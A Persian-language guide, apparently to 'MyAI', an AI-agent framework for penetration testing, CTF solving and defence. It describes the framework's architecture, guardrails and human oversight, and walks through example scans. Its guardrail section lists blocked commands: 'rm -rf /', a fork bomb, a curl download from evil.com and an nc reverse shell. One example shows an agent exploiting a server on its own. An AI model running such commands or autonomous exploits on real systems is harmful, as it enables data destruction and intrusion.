۱. مقدمه - MyAI چیست؟
🎯 تعریف MyAI
MyAI یک فریمورک هوش مصنوعی متنباز برای امنیت سایبری است که به متخصصان امنیت کمک میکند تا عاملهای هوش مصنوعی تخصصی برای کشف آسیبپذیری، بهرهبرداری، ارزیابی امنیتی و دفاع در برابر تهدیدات بسازند و مستقر کنند.
ویژگیهای کلیدی
💡 چرا MyAI؟
- امکان پشتیبانی از مدل هوش مصنوعی (OpenAI, Anthropic, DeepSeek, Ollama)
- ابزارهای امنیتی آماده برای شناسایی، بهرهبرداری و افزایش دسترسی
- معماری مبتنی بر عامل (Agent-based Architecture)
- محافظت در برابر حملات Prompt Injection
- قابلیت ردیابی و مانیتورینگ با OpenTelemetry
- طراحی سبک و قابل توسعه
🔍 موارد استفاده
• تست نفوذ: کشف خودکار آسیبپذیریها و بهرهبرداری
• مسابقات CTF: حل چالشهای امنیتی به صورت خودکار
• Bug Bounty: شناسایی و گزارش آسیبپذیریها
• Red Team: شبیهسازی حملات و ارزیابی دفاع
• Blue Team: شکار تهدید و پاسخ به حوادث
• آموزش: یادگیری امنیت سایبری با کمک هوش مصنوعی
• مسابقات CTF: حل چالشهای امنیتی به صورت خودکار
• Bug Bounty: شناسایی و گزارش آسیبپذیریها
• Red Team: شبیهسازی حملات و ارزیابی دفاع
• Blue Team: شکار تهدید و پاسخ به حوادث
• آموزش: یادگیری امنیت سایبری با کمک هوش مصنوعی
۲. مفاهیم پایه
🤖 Agent (عامل)
عامل یک سیستم هوشمند است که با محیط خود تعامل میکند. در MyAI، عاملها از مدلهای زبانی بزرگ (LLM) برای تصمیمگیری استفاده میکنند و با استفاده از ابزارها (Tools) اقدامات امنیتی را انجام میدهند.
🔧 Tools (ابزارها)
ابزارها قابلیتهایی هستند که عاملها میتوانند از آنها استفاده کنند. مثل nmap برای اسکن شبکه، curl برای درخواستهای HTTP، یا ابزارهای سفارشی برای کارهای تخصصی.
🔄 Handoffs (انتقال وظیفه)
زمانی که یک عامل نیاز به تخصص خاصی دارد، میتواند کار را به عامل دیگری واگذار کند. مثلاً عامل اصلی کار رمزنگاری را به عامل تخصصی Crypto واگذار میکند.
🛡️ Guardrails (محافظها)
لایههای امنیتی که از اجرای دستورات خطرناک جلوگیری میکنند و در برابر حملات Prompt Injection محافظت میکنند.
👤 HITL (Human-in-the-Loop)
امکان مداخله انسان در هر لحظه از اجرا. با فشار Ctrl+C میتوانید عامل را متوقف کرده، وضعیت را بررسی کنید و راهنمایی ارائه دهید.
🔁 Interaction vs Turn
Interaction: یک چرخه کامل فکر کردن (Reason) و عمل کردن (Act) توسط عامل
Turn: مجموعهای از Interaction ها که تا رسیدن به هدف ادامه مییابد
Turn: مجموعهای از Interaction ها که تا رسیدن به هدف ادامه مییابد
۳. معماری سیستم
نمای کلی معماری
معماری MyAI بر اساس هشت ستون اصلی بنا شده است که با هم یک سیستم کامل و قدرتمند برای امنیت سایبری میسازند.
🏗️ معماری کلی سیستم
شما (کاربر)
↓
┌───────────────────┐
│ MyAI Framework │ ← شما دستور میدهید
└───────────────────┘
↓
┌───────────────────┐
│ AI Agent │ ← هوش مصنوعی فکر میکند
└───────────────────┘
↓
┌───────────────────┐
│ Tools │ ← ابزارها اجرا میشوند
│ (nmap, curl) │
└───────────────────┘
↓
┌───────────────────┐
│ Target System │ ← سیستم هدف بررسی میشود
└───────────────────┘
توضیح جریان:
- کاربر دستور امنیتی را وارد میکند
- MyAI Framework دستور را دریافت و پردازش میکند
- Agent با استفاده از LLM تصمیم میگیرد
- ابزارهای لازم اجرا میشوند
- سیستم هدف بررسی شده و نتایج برمیگردد
🔷 هشت ستون اصلی MyAI
┌───────────────┐ ┌───────────┐
│ HITL │◄─────────►│ Turns │
│ (Human-in-the │ │ │
│ Loop) │ │ │
└───────┬───────┘ └───────────┘
│
▼
┌───────────┐ ┌───────────┐ ┌───────────┐ ┌───────────┐
│ Patterns │◄─────►│ Handoffs │◄─────►│ Agents │◄────►│ LLMs │
│ │ │ │ │ (ReACT) │ │ │
└───────────┘ └─────┬─────┘ └─────┬─────┘ └───────────┘
│ │
│ ▼
┌────────────┐ ┌────┴──────┐ ┌───────────┐ ┌────────────┐
│ Extensions │◄─────►│ Tracing │ │ Tools │◄───►│ Guardrails │
│ (MCP) │ │ (Phoenix) │ │ │ │ │
└────────────┘ └───────────┘ └───────────┘ └────────────┘
│
┌─────────────┬─────┴────┬─────────────┐
▼ ▼ ▼ ▼
┌───────────┐┌───────────┐┌────────────┐┌───────────┐
│ LinuxCmd ││ WebSearch ││ Code ││ SSHTunnel │
└───────────┘└───────────┘└────────────┘└───────────┘
🎯 ستونهای اصلی
- Agents: مغز سیستم - تصمیمگیری با LLM
- Tools: دست و پای سیستم - اجرای عملیات
- Handoffs: انتقال کار به عاملهای تخصصی
- Patterns: الگوهای هماهنگی بین عاملها
- Turns: چرخههای اجرا و تصمیمگیری
- Tracing: ردیابی و مانیتورینگ عملیات
- Guardrails: امنیت و جلوگیری از خطرات
- HITL: کنترل و نظارت انسانی
۴. عاملهای هوش مصنوعی (Agents)
🧠 Agent چیست؟
عامل یک سیستم هوشمند است که محیط خود را از طریق حسگرها درک میکند، درباره اهداف خود استدلال میکند و با استفاده از عملگرها بر محیط تأثیر میگذارد. در امنیت سایبری، عاملها از رابطهای شبکه به عنوان حسگر و از دستورات امنیتی به عنوان عملگر استفاده میکنند.
ساختار یک Agent
📦 اجزای یک Agent
┌─────────────────────────────────────────────────────────────┐
│ Agent Structure │
├─────────────────────────────────────────────────────────────┤
│ │
│ ┌────────────────────────────────────────────────────┐ │
│ │ Agent Configuration │ │
│ ├────────────────────────────────────────────────────┤ │
│ │ • Name: Agent identifier │ │
│ │ • Instructions: System prompt │ │
│ │ • Model: LLM configuration │ │
│ │ • Tools: Available capabilities │ │
│ │ • Handoffs: Sub-agent delegation │ │
│ │ • Context: State & dependencies │ │
│ └────────────────────────────────────────────────────┘ │
│ │
│ ┌────────────────────────────────────────────────────┐ │
│ │ ReACT Pattern Implementation │ │
│ ├────────────────────────────────────────────────────┤ │
│ │ │ │
│ │ 1. REASON: LLM analyzes situation │ │
│ │ ↓ │ │
│ │ 2. ACT: Execute tools (0 to N) │ │
│ │ ↓ │ │
│ │ 3. OBSERVE: Collect results │ │
│ │ ↓ │ │
│ │ 4. ITERATE: Repeat until goal achieved │ │
│ │ │ │
│ └────────────────────────────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────┘
توضیح اجزا:
- Name: شناسه منحصر به فرد عامل
- Instructions: دستورالعملهای سیستمی (System Prompt)
- Model: مدل LLM مورد استفاده (GPT-4, Claude, etc.)
- Tools: ابزارهایی که عامل میتواند استفاده کند
- Handoffs: عاملهای فرعی که میتوان کار را به آنها واگذار کرد
۵. الگوی ReACT
🔄 ReACT چیست؟
ReACT مخفف Reasoning and Action است. این الگو نحوه کار عاملهای هوش مصنوعی را مشخص میکند: ابتدا فکر کن (Reason)، سپس عمل کن (Act)، نتیجه را مشاهده کن (Observe) و این چرخه را تکرار کن تا به هدف برسی.
🔁 چرخه ReACT
┌─────────────────────────────────────────────────────────────────────┐
│ Agent Execution Flow (ReACT) │
└─────────────────────────────────────────────────────────────────────┘
┌──────────────┐
│ User Input │
│ (Task) │
└──────┬───────┘
│
▼
┌───────────────────────┐
│ Input Guardrails │
│ (Prompt Injection │
│ Detection) │
└───────────┬───────────┘
│
▼
╔═══════════════════════════════════════════════╗
║ INTERACTION LOOP ║
╠═══════════════════════════════════════════════╣
║ ║
║ ┌──────────────────────────────────────┐ ║
║ │ 1. REASON (LLM Inference) │ ║
║ │ • Analyze current state │ ║
║ │ • Plan next action │ ║
║ │ • Select tools or handoff │ ║
║ └──────────────┬───────────────────────┘ ║
║ │ ║
║ ▼ ║
║ ┌──────────────────────────────────────┐ ║
║ │ 2. ACT (Tool Execution) │ ║
║ │ • Execute 0-N tools │ ║
║ │ • Run commands │ ║
║ │ • Gather information │ ║
║ │ • Or delegate to sub-agent │ ║
║ └──────────────┬───────────────────────┘ ║
║ │ ║
║ ▼ ║
║ ┌──────────────────────────────────────┐ ║
║ │ 3. OBSERVE (Result Collection) │ ║
║ │ • Collect tool outputs │ ║
║ │ • Update context │ ║
║ │ • Validate results │ ║
║ └──────────────┬───────────────────────┘ ║
║ │ ║
║ ▼ ║
║ ┌──────────────────────────────────────┐ ║
║ │ 4. DECIDE │ ║
║ │ Goal achieved? ───Yes──► Exit │ ║
║ │ │ │ ║
║ │ No │ ║
║ │ │ │ ║
║ │ └──► Loop back to REASON │ ║
║ └──────────────────────────────────────┘ ║
║ ║
╚═══════════════════════════════════════════════╝
│
▼
┌───────────────────────┐
│ Output Guardrails │
│ (Command Validation) │
└───────────┬───────────┘
│
▼
┌──────────────┐
│ Result │
│ (Output) │
└──────────────┘
💡 مثال واقعی: اسکن یک سیستم
دستور: "IP این سیستم را اسکن کن: 192.168.1.100" چرخه 1: REASON: "باید اول ببینم سیستم زنده است یا نه" ACT: ping 192.168.1.100 را اجرا میکند OBSERVE: "سیستم زنده است!" چرخه 2: REASON: "حالا باید پورتهای باز را پیدا کنم" ACT: nmap -p- 192.168.1.100 را اجرا میکند OBSERVE: "پورت 22, 80, 443 باز است" چرخه 3: REASON: "باید سرویسهای روی این پورتها را شناسایی کنم" ACT: nmap -sV 192.168.1.100 را اجرا میکند OBSERVE: "SSH, HTTP, HTTPS یافت شد" هدف حاصل شد ✓
۶. الگوهای چند عامله
در سیستمهای پیچیده، چندین عامل با هم کار میکنند. الگوهای مختلفی برای هماهنگی بین عاملها وجود دارد.
۱. الگوی سلسله مراتبی (Hierarchical)
┌─────────────────┐
│ Lead Agent │ ← رئیس تیم
│ (مدیر) │
└────────┬────────┘
│
تصمیم میگیرد چه کسی کار کند
│
┌──────────────────┼──────────────────┐
↓ ↓ ↓
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Network Agent │ │ Crypto Agent │ │ Web Agent │
│ (شبکه) │ │ (رمزنگاری) │ │ (وب) │
└───────────────┘ └───────────────┘ └───────────────┘
مثال: عامل اصلی تشخیص میدهد چالش مربوط به رمزنگاری است و کار را به Crypto Agent واگذار میکند.
۲. الگوی زنجیرهای (Chain)
Agent 1 Agent 2 Agent 3 Agent 4
(اسکن) ───► (تحلیل) ───► (حمله) ───► (گزارش)
مثال: عامل اول اسکن میکند، دوم تحلیل میکند، سوم حمله میکند و چهارم گزارش مینویسد.
۳. الگوی موازی (Parallel)
┌─────────────────┐
│ Coordinator │
└────────┬────────┘
│
┌──────────────────┼──────────────────┐
↓ ↓ ↓
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
│ Agent A │ │ Agent B │ │ Agent C │
│ اسکن IP 1 │ │ اسکن IP 2 │ │ اسکن IP 3 │
└───────┬───────┘ └───────┬───────┘ └───────┬───────┘
│ │ │
└──────────────────┼──────────────────┘
↓
نتایج جمع میشود
مزیت: سه برابر سریعتر! همه عاملها همزمان کار میکنند.
۷. امنیت و Guardrails
🛡️ چرا Guardrails لازم است؟
سیستمهای هوش مصنوعی میتوانند هدف حملات Prompt Injection قرار بگیرند یا دستورات خطرناکی تولید کنند. Guardrails از سیستم در برابر این تهدیدات محافظت میکند.
🔒 سیستم چند لایه Guardrails
دستور کاربر
↓
┌─────────────────────────────────────┐
│ Guardrail 1: بررسی ورودی │
│ ✓ آیا دستور خطرناک است؟ │
│ ✓ آیا prompt injection است؟ │
│ ✓ آیا کد مخرب دارد؟ │
└──────────┬──────────────────────────┘
↓ ✓ امن است
┌─────────────────────────────────────┐
│ Agent کار میکند │
└──────────┬──────────────────────────┘
↓
┌─────────────────────────────────────┐
│ Guardrail 2: بررسی خروجی │
│ ✓ آیا دستور خطرناک تولید شده؟ │
│ ✓ آیا reverse shell است؟ │
│ ✓ آیا داده حساس لو میرود؟ │
└──────────┬──────────────────────────┘
↓ ✓ امن است
نتیجه به کاربر
⚠️ دستورات خطرناک که مسدود میشوند
- rm -rf / (حذف کل سیستم)
- :(){ :|:& };: (fork bomb)
- curl http://evil.com/shell (دانلود shell مخرب)
- nc -e /bin/bash attacker (reverse shell)
Human-in-the-Loop (HITL)
Agent مشغول کار است...
↓
┌─────────────┐
│ Agent │ ← در حال اسکن...
│ در حال کار │
└─────────────┘
↓
شما Ctrl+C میزنید!
↓
┌─────────────┐
│ توقف! │
│ │
└─────────────┘
↓
┌──────────────────────────────┐
│ شما میتوانید: │
│ • وضعیت را ببینید │
│ • دستور جدید بدهید │
│ • مسیر را تغییر دهید │
│ • ادامه دهید یا متوقف کنید │
└──────────────────────────────┘
اهمیت HITL: کنترل کامل در دست شماست. میتوانید در هر لحظه مداخله کنید، اشتباهات را تصحیح کنید و راهنمایی ارائه دهید.
۸. ابزارها و قابلیتها
ابزارها بر اساس زنجیره حمله امنیتی (Security Kill Chain) دستهبندی شدهاند.
🔧 ابزارها بر اساس مرحله حمله
1️⃣ شناسایی (Reconnaissance)
┌──────────────────────────────┐
│ • nmap → اسکن شبکه │
│ • netcat → بررسی پورت │
│ • curl → بررسی وب │
│ • shodan → جستجوی اینترنت │
│ • crypto → رمزنگاری │
└──────────────────────────────┘
2️⃣ حمله (Exploitation)
┌──────────────────────────────┐
│ • exploit tools │
│ • webshell │
│ • code execution │
└──────────────────────────────┘
3️⃣ افزایش دسترسی (Privilege Escalation)
┌──────────────────────────────┐
│ • sudo exploits │
│ • kernel exploits │
│ • suid binaries │
└──────────────────────────────┘
4️⃣ حرکت جانبی (Lateral Movement)
┌──────────────────────────────┐
│ • SSH tunneling │
│ • credential reuse │
│ • network pivoting │
└──────────────────────────────┘
5️⃣ استخراج داده (Data Exfiltration)
┌──────────────────────────────┐
│ • file transfer │
│ • data extraction │
└──────────────────────────────┘
6️⃣ کنترل (Command & Control)
┌──────────────────────────────┐
│ • remote access │
│ • persistence │
└──────────────────────────────┘
🌟 ویژگیهای ابزارها
- قابل سفارشیسازی: میتوانید ابزار خود را بسازید
- مدولار: هر ابزار مستقل از دیگری کار میکند
- ایمن: تحت نظارت Guardrails اجرا میشوند
- قابل ترکیب: ابزارها را میتوان با هم ترکیب کرد
۹. مثالهای کاربردی
🎯 مثال ۱: حل چالش CTF
شما: "این چالش CTF را حل کن"
MyAI:
Step 1: بررسی فایل چالش
Step 2: شناسایی نوع چالش (crypto, web, forensics, ...)
Step 3: انتخاب Agent مناسب
Step 4: اجرای ابزارهای مربوطه
Step 5: پیدا کردن flag
Step 6: تأیید صحت flag
نتیجه: FLAG{example_flag_here}
🔍 مثال ۲: تست نفوذ سرور
شما: "سرور 192.168.1.100 را تست کن" MyAI: Interaction 1: ping → سرور زنده است Interaction 2: nmap → پورتهای 22, 80, 443 باز Interaction 3: service detection → SSH, HTTP, HTTPS Interaction 4: vulnerability scan → OpenSSH 7.4 (قدیمی) Interaction 5: exploit search → CVE-2018-XXXX پیدا شد Interaction 6: exploit attempt → موفق! نتیجه: دسترسی به سرور حاصل شد
🌐 مثال ۳: تحلیل وبسایت
شما: "وبسایت example.com را بررسی کن" MyAI: Interaction 1: DNS lookup → IP address Interaction 2: Port scan → Open ports Interaction 3: HTTP headers → Server info Interaction 4: Directory scan → Hidden paths Interaction 5: Vulnerability scan → Security issues Interaction 6: Report generation → Full report نتیجه: گزارش کامل امنیتی
جریان کامل یک Task
📋 مثال کامل: اسکن وبسایت
مرحله 1: شما دستور میدهید
┌────────────────────────────────┐
│ MyAI> این وبسایت را اسکن کن: │
│ https://example.com │
└────────────────┬───────────────┘
↓
مرحله 2: Guardrail بررسی میکند
┌────────────────────────────────┐
│ ✓ دستور امن است │
│ ✓ هیچ کد مخربی نیست │
└────────────────┬───────────────┘
↓
مرحله 3: Agent انتخاب میشود
┌────────────────────────────────┐
│ Red Team Agent انتخاب شد │
└────────────────┬───────────────┘
↓
مرحله 4: Agent شروع به کار میکند (ReACT)
┌────────────────────────────────┐
│ Interaction 1: │
│ REASON: باید اول DNS را چک کنم│
│ ACT: nslookup example.com │
│ OBSERVE: IP = 93.184.216.34 │
└────────────────┬───────────────┘
↓
┌────────────────────────────────┐
│ Interaction 2: │
│ REASON: حالا پورتها را اسکن │
│ ACT: nmap 93.184.216.34 │
│ OBSERVE: پورت 80, 443 باز │
└────────────────┬───────────────┘
↓
┌────────────────────────────────┐
│ Interaction 3: │
│ REASON: باید headerها را ببینم│
│ ACT: curl -I example.com │
│ OBSERVE: Apache 2.4, PHP 7.4 │
└────────────────┬───────────────┘
↓
مرحله 5: Guardrail خروجی را بررسی میکند
┌────────────────────────────────┐
│ ✓ هیچ دستور خطرناکی نیست │
└────────────────┬───────────────┘
↓
مرحله 6: نتیجه به شما نمایش داده میشود
┌────────────────────────────────┐
│ گزارش کامل: │
│ • IP: 93.184.216.34 │
│ • پورتهای باز: 80, 443 │
│ • سرور: Apache 2.4 │
│ • آسیبپذیریهای یافت شده: │
│ - Directory listing enabled │
│ - Old PHP version │
└────────────────────────────────┘
🚀 چگونه شروع کنیم؟
📦 نصب MyAI
# نصب MyAI pip install myai-framework # تنظیم API Key echo 'OPENAI_API_KEY="sk-your-key"' > .env # اجرا myai # شروع کار MyAI> این سیستم را اسکن کن: 192.168.1.100
💡 نکات کلیدی
- Agent = مغز: فکر میکند و تصمیم میگیرد
- Tools = دست و پا: کارها را انجام میدهند
- Guardrails = ایمنی: از خطرات جلوگیری میکند
- HITL = کنترل: شما همیشه کنترل دارید
- ReACT = چرخه کاری: فکر → عمل → مشاهده → تکرار
🎓 پایان کتابچه
این کتابچه راهنمای جامعی برای درک معماری و نحوه کار MyAI بود.
برای اطلاعات بیشتر به مستندات کامل مراجعه کنید.
نویسنده: Ramin Farajpour Cami
October 2025
October 2025